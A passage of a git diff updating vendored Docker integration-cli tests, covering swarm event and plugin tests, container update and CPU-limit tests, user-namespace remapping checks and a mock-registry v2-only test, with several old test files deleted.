"+id, defaultRetryCount) + + t1 := daemonUnixTime(c) + d.DeleteSecret(c, id) + // filtered by secret + waitForEvent(c, d, t1, "-f type=secret", "secret remove "+id, defaultRetryCount) +} + +func (s *DockerSwarmSuite) TestSwarmClusterEventsConfig(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_config" + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + waitForEvent(c, d, "0", "-f scope=swarm", "config create "+id, defaultRetryCount) + + t1 := daemonUnixTime(c) + d.DeleteConfig(c, id) + // filtered by config + waitForEvent(c, d, t1, "-f type=config", "config remove "+id, defaultRetryCount) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go index d9e56ce6df..3b890bcc69 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_unix_test.go @@ -5,20 +5,21 @@ package main import ( "encoding/json" "strings" + "time" "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) func (s *DockerSwarmSuite) TestSwarmVolumePlugin(c *check.C) { d := s.AddDaemon(c, true, true) - out, err := d.Cmd("service", "create", "--mount", "type=volume,source=my-volume,destination=/foo,volume-driver=customvolumedriver", "--name", "top", "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--mount", "type=volume,source=my-volume,destination=/foo,volume-driver=customvolumedriver", "--name", "top", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) // Make sure task stays pending before plugin is available - waitAndAssert(c, defaultReconciliationTimeout, d.checkServiceTasksInState("top", swarm.TaskStatePending, "missing plugin on 1 node"), checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckServiceTasksInStateWithError("top", swarm.TaskStatePending, "missing plugin on 1 node"), checker.Equals, 1) plugin := newVolumePlugin(c, "customvolumedriver") defer plugin.Close() @@ -31,7 +32,7 @@ func (s *DockerSwarmSuite) TestSwarmVolumePlugin(c *check.C) { // this long delay. // make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) out, err = d.Cmd("ps", "-q") c.Assert(err, checker.IsNil) @@ -50,3 +51,54 @@ func (s *DockerSwarmSuite) TestSwarmVolumePlugin(c *check.C) { c.Assert(mounts[0].Name, checker.Equals, "my-volume") c.Assert(mounts[0].Driver, checker.Equals, "customvolumedriver") } + +// Test network plugin filter in swarm +func (s *DockerSwarmSuite) TestSwarmNetworkPluginV2(c *check.C) { + testRequires(c, IsAmd64) + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + + // install plugin on d1 and d2 + pluginName := "aragunathan/global-net-plugin:latest" + + _, err := d1.Cmd("plugin", "install", pluginName, "--grant-all-permissions") + c.Assert(err, checker.IsNil) + + _, err = d2.Cmd("plugin", "install", pluginName, "--grant-all-permissions") + c.Assert(err, checker.IsNil) + + // create network + networkName := "globalnet" + _, err = d1.Cmd("network", "create", "--driver", pluginName, networkName) + c.Assert(err, checker.IsNil) + + // create a global service to ensure that both nodes will have an instance + serviceName := "my-service" + _, err = d1.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--mode=global", "--network", networkName, "busybox", "top") + c.Assert(err, checker.IsNil) + + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, 2) + + // remove service + _, err = d1.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil) + + // wait to ensure all containers have exited before removing the plugin. Else there's a + // possibility of container exits erroring out due to plugins being unavailable. + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, 0) + + // disable plugin on worker + _, err = d2.Cmd("plugin", "disable", "-f", pluginName) + c.Assert(err, checker.IsNil) + + time.Sleep(20 * time.Second) + + image := "busybox:latest" + // create a new global service again. + _, err = d1.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--mode=global", "--network", networkName, image, "top") + c.Assert(err, checker.IsNil) + + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{image: 1}) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go deleted file mode 100644 index b7d2b1dfe6..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go +++ /dev/null @@ -1,225 +0,0 @@ -package main - -import ( - "fmt" - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/stringutils" - "github.com/go-check/check" -) - -// tagging a named image in a new unprefixed repo should work -func (s *DockerSuite) TestTagUnprefixedRepoByName(c *check.C) { - // Don't attempt to pull on Windows as not in hub. It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - - dockerCmd(c, "tag", "busybox:latest", "testfoobarbaz") -} - -// tagging an image by ID in a new unprefixed repo should work -func (s *DockerSuite) TestTagUnprefixedRepoByID(c *check.C) { - imageID := inspectField(c, "busybox", "Id") - dockerCmd(c, "tag", imageID, "testfoobarbaz") -} - -// ensure we don't allow the use of invalid repository names; these tag operations should fail -func (s *DockerSuite) TestTagInvalidUnprefixedRepo(c *check.C) { - invalidRepos := []string{"fo$z$", "Foo@3cc", "Foo$3", "Foo*3", "Fo^3", "Foo!3", "F)xcz(", "fo%asd", "FOO/bar"} - - for _, repo := range invalidRepos { - out, _, err := dockerCmdWithError("tag", "busybox", repo) - c.Assert(err, checker.NotNil, check.Commentf("tag busybox %v should have failed : %v", repo, out)) - } -} - -// ensure we don't allow the use of invalid tags; these tag operations should fail -func (s *DockerSuite) TestTagInvalidPrefixedRepo(c *check.C) { - longTag := stringutils.GenerateRandomAlphaOnlyString(121) - - invalidTags := []string{"repo:fo$z$", "repo:Foo@3cc", "repo:Foo$3", "repo:Foo*3", "repo:Fo^3", "repo:Foo!3", "repo:%goodbye", "repo:#hashtagit", "repo:F)xcz(", "repo:-foo", "repo:..", longTag} - - for _, repotag := range invalidTags { - out, _, err := dockerCmdWithError("tag", "busybox", repotag) - c.Assert(err, checker.NotNil, check.Commentf("tag busybox %v should have failed : %v", repotag, out)) - } -} - -// ensure we allow the use of valid tags -func (s *DockerSuite) TestTagValidPrefixedRepo(c *check.C) { - // Don't attempt to pull on Windows as not in hub. It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - - validRepos := []string{"fooo/bar", "fooaa/test", "foooo:t", "HOSTNAME.DOMAIN.COM:443/foo/bar"} - - for _, repo := range validRepos { - _, _, err := dockerCmdWithError("tag", "busybox:latest", repo) - if err != nil { - c.Errorf("tag busybox %v should have worked: %s", repo, err) - continue - } - deleteImages(repo) - } -} - -// tag an image with an existed tag name without -f option should work -func (s *DockerSuite) TestTagExistedNameWithoutForce(c *check.C) { - // Don't attempt to pull on Windows as not in hub. It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - - dockerCmd(c, "tag", "busybox:latest", "busybox:test") -} - -func (s *DockerSuite) TestTagWithPrefixHyphen(c *check.C) { - // Don't attempt to pull on Windows as not in hub. It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - // test repository name begin with '-' - out, _, err := dockerCmdWithError("tag", "busybox:latest", "-busybox:test") - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed")) - - // test namespace name begin with '-' - out, _, err = dockerCmdWithError("tag", "busybox:latest", "-test/busybox:test") - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed")) - - // test index name begin with '-' - out, _, err = dockerCmdWithError("tag", "busybox:latest", "-index:5000/busybox:test") - c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Error parsing reference", check.Commentf("tag a name begin with '-' should failed")) -} - -// ensure tagging using official names works -// ensure all tags result in the same name -func (s *DockerSuite) TestTagOfficialNames(c *check.C) { - names := []string{ - "docker.io/busybox", - "index.docker.io/busybox", - "library/busybox", - "docker.io/library/busybox", - "index.docker.io/library/busybox", - } - - for _, name := range names { - out, exitCode, err := dockerCmdWithError("tag", "busybox:latest", name+":latest") - if err != nil || exitCode != 0 { - c.Errorf("tag busybox %v should have worked: %s, %s", name, err, out) - continue - } - - // ensure we don't have multiple tag names. - out, _, err = dockerCmdWithError("images") - if err != nil { - c.Errorf("listing images failed with errors: %v, %s", err, out) - } else if strings.Contains(out, name) { - c.Errorf("images should not have listed '%s'", name) - deleteImages(name + ":latest") - } - } - - for _, name := range names { - _, exitCode, err := dockerCmdWithError("tag", name+":latest", "fooo/bar:latest") - if err != nil || exitCode != 0 { - c.Errorf("tag %v fooo/bar should have worked: %s", name, err) - continue - } - deleteImages("fooo/bar:latest") - } -} - -// ensure tags can not match digests -func (s *DockerSuite) TestTagMatchesDigest(c *check.C) { - // Don't attempt to pull on Windows as not in hub. It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - digest := "busybox@sha256:abcdef76720241213f5303bda7704ec4c2ef75613173910a56fb1b6e20251507" - // test setting tag fails - _, _, err := dockerCmdWithError("tag", "busybox:latest", digest) - if err == nil { - c.Fatal("digest tag a name should have failed") - } - // check that no new image matches the digest - _, _, err = dockerCmdWithError("inspect", digest) - if err == nil { - c.Fatal("inspecting by digest should have failed") - } -} - -func (s *DockerSuite) TestTagInvalidRepoName(c *check.C) { - // Don't attempt to pull on Windows as not in hub. It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - - // test setting tag fails - _, _, err := dockerCmdWithError("tag", "busybox:latest", "sha256:sometag") - if err == nil { - c.Fatal("tagging with image named \"sha256\" should have failed") - } -} - -// ensure tags cannot create ambiguity with image ids -func (s *DockerSuite) TestTagTruncationAmbiguity(c *check.C) { - //testRequires(c, DaemonIsLinux) - // Don't attempt to pull on Windows as not in hub. It's installed - // as an image through .ensure-frozen-images-windows - if daemonPlatform != "windows" { - if err := pullImageIfNotExist("busybox:latest"); err != nil { - c.Fatal("couldn't find the busybox:latest image locally and failed to pull it") - } - } - imageID, err := buildImage("notbusybox:latest", - `FROM busybox - MAINTAINER dockerio`, - true) - if err != nil { - c.Fatal(err) - } - truncatedImageID := stringid.TruncateID(imageID) - truncatedTag := fmt.Sprintf("notbusybox:%s", truncatedImageID) - - id := inspectField(c, truncatedTag, "Id") - - // Ensure inspect by image id returns image for image id - c.Assert(id, checker.Equals, imageID) - c.Logf("Built image: %s", imageID) - - // test setting tag fails - _, _, err = dockerCmdWithError("tag", "busybox:latest", truncatedTag) - if err != nil { - c.Fatalf("Error tagging with an image id: %s", err) - } - - id = inspectField(c, truncatedTag, "Id") - - // Ensure id is imageID and not busybox:latest - c.Assert(id, checker.Not(checker.Equals), imageID) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go index caae29024a..50744b0111 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_top_test.go @@ -3,28 +3,28 @@ package main import ( "strings" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestTopMultipleArgs(c *check.C) { - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") cleanedContainerID := strings.TrimSpace(out) var expected icmd.Expected - switch daemonPlatform { + switch testEnv.OSType { case "windows": expected = icmd.Expected{ExitCode: 1, Err: "Windows does not support arguments to top"} default: expected = icmd.Expected{Out: "PID"} } result := dockerCmdWithResult("top", cleanedContainerID, "-o", "pid") - c.Assert(result, icmd.Matches, expected) + result.Assert(c, expected) } func (s *DockerSuite) TestTopNonPrivileged(c *check.C) { - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") cleanedContainerID := strings.TrimSpace(out) out1, _ := dockerCmd(c, "top", cleanedContainerID) @@ -34,7 +34,7 @@ func (s *DockerSuite) TestTopNonPrivileged(c *check.C) { // Windows will list the name of the launched executable which in this case is busybox.exe, without the parameters. // Linux will display the command executed in the container var lookingFor string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { lookingFor = "busybox.exe" } else { lookingFor = "top" @@ -49,7 +49,7 @@ func (s *DockerSuite) TestTopNonPrivileged(c *check.C) { // very different to Linux in this regard. func (s *DockerSuite) TestTopWindowsCoreProcesses(c *check.C) { testRequires(c, DaemonIsWindows) - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") cleanedContainerID := strings.TrimSpace(out) out1, _ := dockerCmd(c, "top", cleanedContainerID) lookingFor := []string{"smss.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe", "CExecSvc.exe"} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go deleted file mode 100644 index 0b31bb45ff..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go +++ /dev/null @@ -1,41 +0,0 @@ -package main - -import ( - "strings" - "time" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestUpdateRestartPolicy(c *check.C) { - out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "sh", "-c", "sleep 1 && false") - timeout := 60 * time.Second - if daemonPlatform == "windows" { - timeout = 180 * time.Second - } - - id := strings.TrimSpace(string(out)) - - // update restart policy to on-failure:5 - dockerCmd(c, "update", "--restart=on-failure:5", id) - - err := waitExited(id, timeout) - c.Assert(err, checker.IsNil) - - count := inspectField(c, id, "RestartCount") - c.Assert(count, checker.Equals, "5") - - maximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") - c.Assert(maximumRetryCount, checker.Equals, "5") -} - -func (s *DockerSuite) TestUpdateRestartWithAutoRemoveFlag(c *check.C) { - out, _ := runSleepingContainer(c, "--rm") - id := strings.TrimSpace(out) - - // update restart policy for an AutoRemove container - out, _, err := dockerCmdWithError("update", "--restart=always", id) - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "Restart policy cannot be updated because AutoRemove is enabled for the container") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go index 580ff02602..564c50f32f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_update_unix_test.go @@ -3,17 +3,20 @@ package main import ( + "context" "encoding/json" "fmt" - "github.com/kr/pty" "os/exec" "strings" "time" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/docker/docker/pkg/parsers/kernel" "github.com/go-check/check" + "github.com/kr/pty" ) func (s *DockerSuite) TestUpdateRunningContainer(c *check.C) { @@ -136,7 +139,7 @@ func (s *DockerSuite) TestUpdateKernelMemory(c *check.C) { func (s *DockerSuite) TestUpdateKernelMemoryUninitialized(c *check.C) { testRequires(c, DaemonIsLinux, kernelMemorySupport) - isNewKernel := kernel.CheckKernelVersion(4, 6, 0) + isNewKernel := CheckKernelVersion(4, 6, 0) name := "test-update-container" dockerCmd(c, "run", "-d", "--name", name, "busybox", "top") _, _, err := dockerCmdWithError("update", "--kernel-memory", "100M", name) @@ -168,6 +171,18 @@ func (s *DockerSuite) TestUpdateKernelMemoryUninitialized(c *check.C) { c.Assert(strings.TrimSpace(out), checker.Equals, "314572800") } +// GetKernelVersion gets the current kernel version. +func GetKernelVersion() *kernel.VersionInfo { + v, _ := kernel.ParseRelease(testEnv.DaemonInfo.KernelVersion) + return v +} + +// CheckKernelVersion checks if current kernel is newer than (or equal to) +// the given version. +func CheckKernelVersion(k, major, minor int) bool { + return kernel.CompareKernelVersion(*GetKernelVersion(), kernel.VersionInfo{Kernel: k, Major: major, Minor: minor}) >= 0 +} + func (s *DockerSuite) TestUpdateSwapMemoryOnly(c *check.C) { testRequires(c, DaemonIsLinux) testRequires(c, memoryLimitSupport) @@ -219,7 +234,7 @@ func (s *DockerSuite) TestUpdateStats(c *check.C) { c.Assert(waitRun(name), checker.IsNil) getMemLimit := func(id string) uint64 { - resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "") + resp, body, err := request.Get(fmt.Sprintf("/containers/%s/stats?stream=false", id)) c.Assert(err, checker.IsNil) c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json") @@ -281,3 +296,44 @@ func (s *DockerSuite) TestUpdateNotAffectMonitorRestartPolicy(c *check.C) { c.Assert(err, checker.IsNil) c.Assert(waitRun(id), checker.IsNil) } + +func (s *DockerSuite) TestUpdateWithNanoCPUs(c *check.C) { + testRequires(c, cpuCfsQuota, cpuCfsPeriod) + + file1 := "/sys/fs/cgroup/cpu/cpu.cfs_quota_us" + file2 := "/sys/fs/cgroup/cpu/cpu.cfs_period_us" + + out, _ := dockerCmd(c, "run", "-d", "--cpus", "0.5", "--name", "top", "busybox", "top") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "exec", "top", "sh", "-c", fmt.Sprintf("cat %s && cat %s", file1, file2)) + c.Assert(strings.TrimSpace(out), checker.Equals, "50000\n100000") + + clt, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + inspect, err := clt.ContainerInspect(context.Background(), "top") + c.Assert(err, checker.IsNil) + c.Assert(inspect.HostConfig.NanoCPUs, checker.Equals, int64(500000000)) + + out = inspectField(c, "top", "HostConfig.CpuQuota") + c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS quota should be 0")) + out = inspectField(c, "top", "HostConfig.CpuPeriod") + c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS period should be 0")) + + out, _, err = dockerCmdWithError("update", "--cpu-quota", "80000", "top") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Conflicting options: CPU Quota cannot be updated as NanoCPUs has already been set") + + out, _ = dockerCmd(c, "update", "--cpus", "0.8", "top") + inspect, err = clt.ContainerInspect(context.Background(), "top") + c.Assert(err, checker.IsNil) + c.Assert(inspect.HostConfig.NanoCPUs, checker.Equals, int64(800000000)) + + out = inspectField(c, "top", "HostConfig.CpuQuota") + c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS quota should be 0")) + out = inspectField(c, "top", "HostConfig.CpuPeriod") + c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS period should be 0")) + + out, _ = dockerCmd(c, "exec", "top", "sh", "-c", fmt.Sprintf("cat %s && cat %s", file1, file2)) + c.Assert(strings.TrimSpace(out), checker.Equals, "80000\n100000") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go index acf74238b2..54cfdd179c 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_userns_test.go @@ -12,7 +12,7 @@ import ( "strconv" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/pkg/system" "github.com/go-check/check" @@ -24,7 +24,7 @@ import ( func (s *DockerDaemonSuite) TestDaemonUserNamespaceRootSetting(c *check.C) { testRequires(c, DaemonIsLinux, SameHostDaemon, UserNamespaceInKernel) - c.Assert(s.d.StartWithBusybox("--userns-remap", "default"), checker.IsNil) + s.d.StartWithBusybox(c, "--userns-remap", "default") tmpDir, err := ioutil.TempDir("", "userns") c.Assert(err, checker.IsNil) @@ -36,8 +36,8 @@ func (s *DockerDaemonSuite) TestDaemonUserNamespaceRootSetting(c *check.C) { defer os.RemoveAll(tmpDirNotExists) // we need to find the uid and gid of the remapped root from the daemon's root dir info - uidgid := strings.Split(filepath.Base(s.d.root), ".") - c.Assert(uidgid, checker.HasLen, 2, check.Commentf("Should have gotten uid/gid strings from root dirname: %s", filepath.Base(s.d.root))) + uidgid := strings.Split(filepath.Base(s.d.Root), ".") + c.Assert(uidgid, checker.HasLen, 2, check.Commentf("Should have gotten uid/gid strings from root dirname: %s", filepath.Base(s.d.Root))) uid, err := strconv.Atoi(uidgid[0]) c.Assert(err, checker.IsNil, check.Commentf("Can't parse uid")) gid, err := strconv.Atoi(uidgid[1]) @@ -61,15 +61,15 @@ func (s *DockerDaemonSuite) TestDaemonUserNamespaceRootSetting(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf("Could not inspect running container: out: %q", pid)) // check the uid and gid maps for the PID to ensure root is remapped // (cmd = cat /proc//uid_map | grep -E '0\s+9999\s+1') - out, rc1, err := runCommandPipelineWithOutput( + out, err = RunCommandPipelineWithOutput( exec.Command("cat", "/proc/"+strings.TrimSpace(pid)+"/uid_map"), exec.Command("grep", "-E", fmt.Sprintf("0[[:space:]]+%d[[:space:]]+", uid))) - c.Assert(rc1, checker.Equals, 0, check.Commentf("Didn't match uid_map: output: %s", out)) + c.Assert(err, check.IsNil) - out, rc2, err := runCommandPipelineWithOutput( + out, err = RunCommandPipelineWithOutput( exec.Command("cat", "/proc/"+strings.TrimSpace(pid)+"/gid_map"), exec.Command("grep", "-E", fmt.Sprintf("0[[:space:]]+%d[[:space:]]+", gid))) - c.Assert(rc2, checker.Equals, 0, check.Commentf("Didn't match gid_map: output: %s", out)) + c.Assert(err, check.IsNil) // check that the touched file is owned by remapped uid:gid stat, err := system.Stat(filepath.Join(tmpDir, "testfile")) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go index 889936a062..df0c01a517 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_v2_only_test.go @@ -6,120 +6,53 @@ import ( "net/http" "os" + "github.com/docker/docker/internal/test/registry" "github.com/go-check/check" ) -func makefile(contents string) (string, func(), error) { - cleanup := func() { - - } - - f, err := ioutil.TempFile(".", "tmp") +func makefile(path string, contents string) (string, error) { + f, err := ioutil.TempFile(path, "tmp") if err != nil { - return "", cleanup, err + return "", err } err = ioutil.WriteFile(f.Name(), []byte(contents), os.ModePerm) if err != nil { - return "", cleanup, err - } - - cleanup = func() { - err := os.Remove(f.Name()) - if err != nil { - fmt.Println("Error removing tmpfile") - } + return "", err } - return f.Name(), cleanup, nil - + return f.Name(), nil } -// TestV2Only ensures that a daemon in v2-only mode does not +// TestV2Only ensures that a daemon does not // attempt to contact any v1 registry endpoints. func (s *DockerRegistrySuite) TestV2Only(c *check.C) { - reg, err := newTestRegistry(c) + reg, err := registry.NewMock(c) + defer reg.Close() c.Assert(err, check.IsNil) - reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { + reg.RegisterHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(404) }) - reg.registerHandler("/v1/.*", func(w http.ResponseWriter, r *http.Request) { + reg.RegisterHandler("/v1/.*", func(w http.ResponseWriter, r *http.Request) { c.Fatal("V1 registry contacted") }) - repoName := fmt.Sprintf("%s/busybox", reg.hostport) - - err = s.d.Start("--insecure-registry", reg.hostport, "--disable-legacy-registry=true") - c.Assert(err, check.IsNil) + repoName := fmt.Sprintf("%s/busybox", reg.URL()) - dockerfileName, cleanup, err := makefile(fmt.Sprintf("FROM %s/busybox", reg.hostport)) - c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) - defer cleanup() + s.d.Start(c, "--insecure-registry", reg.URL()) - s.d.Cmd("build", "--file", dockerfileName, ".") - - s.d.Cmd("run", repoName) - s.d.Cmd("login", "-u", "richard", "-p", "testtest", "-e", "testuser@testdomain.com", reg.hostport) - s.d.Cmd("tag", "busybox", repoName) - s.d.Cmd("push", repoName) - s.d.Cmd("pull", repoName) -} - -// TestV1 starts a daemon in 'normal' mode -// and ensure v1 endpoints are hit for the following operations: -// login, push, pull, build & run -func (s *DockerRegistrySuite) TestV1(c *check.C) { - reg, err := newTestRegistry(c) + tmp, err := ioutil.TempDir("", "integration-cli-") c.Assert(err, check.IsNil) + defer os.RemoveAll(tmp) - v2Pings := 0 - reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { - v2Pings++ - // V2 ping 404 causes fallback to v1 - w.WriteHeader(404) - }) - - v1Pings := 0 - reg.registerHandler("/v1/_ping", func(w http.ResponseWriter, r *http.Request) { - v1Pings++ - }) - - v1Logins := 0 - reg.registerHandler("/v1/users/", func(w http.ResponseWriter, r *http.Request) { - v1Logins++ - }) - - v1Repo := 0 - reg.registerHandler("/v1/repositories/busybox/", func(w http.ResponseWriter, r *http.Request) { - v1Repo++ - }) - - reg.registerHandler("/v1/repositories/busybox/images", func(w http.ResponseWriter, r *http.Request) { - v1Repo++ - }) - - err = s.d.Start("--insecure-registry", reg.hostport, "--disable-legacy-registry=false") - c.Assert(err, check.IsNil) - - dockerfileName, cleanup, err := makefile(fmt.Sprintf("FROM %s/busybox", reg.hostport)) + dockerfileName, err := makefile(tmp, fmt.Sprintf("FROM %s/busybox", reg.URL())) c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) - defer cleanup() - s.d.Cmd("build", "--file", dockerfileName, ".") - c.Assert(v1Repo, check.Equals, 1, check.Commentf("Expected v1 repository access after build")) + s.d.Cmd("build", "--file", dockerfileName, tmp) - repoName := fmt.Sprintf("%s/busybox", reg.hostport) s.d.Cmd("run", repoName) - c.Assert(v1Repo, check.Equals, 2, check.Commentf("Expected v1 repository access after run")) - - s.d.Cmd("login", "-u", "richard", "-p", "testtest", reg.hostport) - c.Assert(v1Logins, check.Equals, 1, check.Commentf("Expected v1 login attempt")) - + s.d.Cmd("login", "-u", "richard", "-p", "testtest", reg.URL()) s.d.Cmd("tag", "busybox", repoName) s.d.Cmd("push", repoName) - - c.Assert(v1Repo, check.Equals, 2) - s.d.Cmd("pull", repoName) - c.Assert(v1Repo, check.Equals, 3, check.Commentf("Expected v1 repository access after pull")) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go deleted file mode 100644 index 7672beb732..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go +++ /dev/null @@ -1,58 +0,0 @@ -package main - -import ( - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -// ensure docker version works -func (s *DockerSuite) TestVersionEnsureSucceeds(c *check.C) { - out, _ := dockerCmd(c, "version") - stringsToCheck := map[string]int{ - "Client:": 1, - "Server:": 1, - " Version:": 2, - " API version:": 2, - " Go version:": 2, - " Git commit:": 2, - " OS/Arch:": 2, - " Built:": 2, - } - - for k, v := range stringsToCheck { - c.Assert(strings.Count(out, k), checker.Equals, v, check.Commentf("The count of %v in %s does not match excepted", k, out)) - } -} - -// ensure the Windows daemon return the correct platform string -func (s *DockerSuite) TestVersionPlatform_w(c *check.C) { - testRequires(c, DaemonIsWindows) - testVersionPlatform(c, "windows/amd64") -} - -// ensure the Linux daemon return the correct platform string -func (s *DockerSuite) TestVersionPlatform_l(c *check.C) { - testRequires(c, DaemonIsLinux) - testVersionPlatform(c, "linux") -} - -func testVersionPlatform(c *check.C, platform string) { - out, _ := dockerCmd(c, "version") - expected := "OS/Arch: " + platform - - split := strings.Split(out, "\n") - c.Assert(len(split) >= 14, checker.Equals, true, check.Commentf("got %d lines from version", len(split))) - - // Verify the second 'OS/Arch' matches the platform. Experimental has - // more lines of output than 'regular' - bFound := false - for i := 14; i < len(split); i++ { - if strings.Contains(split[i], expected) { - bFound = true - break - } - } - c.Assert(bFound, checker.Equals, true, check.Commentf("Could not find server '%s' in '%s'", expected, out)) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go index 